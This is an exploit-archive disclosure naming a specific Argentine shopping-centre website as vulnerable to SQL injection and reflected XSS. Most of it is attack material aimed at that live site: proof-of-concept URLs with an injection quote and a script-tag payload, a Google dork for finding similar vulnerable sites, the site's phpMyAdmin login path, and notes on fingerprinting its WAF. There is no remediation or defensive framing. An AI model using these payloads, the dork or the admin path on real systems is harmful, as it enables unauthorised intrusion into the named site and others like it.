Exploit Title: La Paz Shopping (SQL Injection / XSS Reflected)
Discovered By: intrackeable
Date: 13/09/2019
Tested On: Linux Kubuntu
Google Dork: "inurl:.php?id= site:.ar intext:shopping"
Category: WebApps
Vulnerability Type: CWE-89 / CWE-79
Vendor Home Page: lapazshopping.com.ar
PoC:
http://www.lapazshopping.com.ar/locales-interior.php?id=27%27
http://lapazshopping.com.ar/locales.php?action=buscar&button2=Buscar&marca=0027&rubro=%3C%2Fscript%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3B%3C%2Fscript%3E%3Cscript%3E
Admin Login Paths:
http://lapazshopping.com.ar/phpmyadmin
WAF Detection:
The site http://lapazshopping.com.ar seems to be behind a WAF or some sort of security solution.
The server header for a normal response is "Microsoft-IIS/10.0", while the server header a response to an attack is "Microsoft-HTTPAPI/2.0.",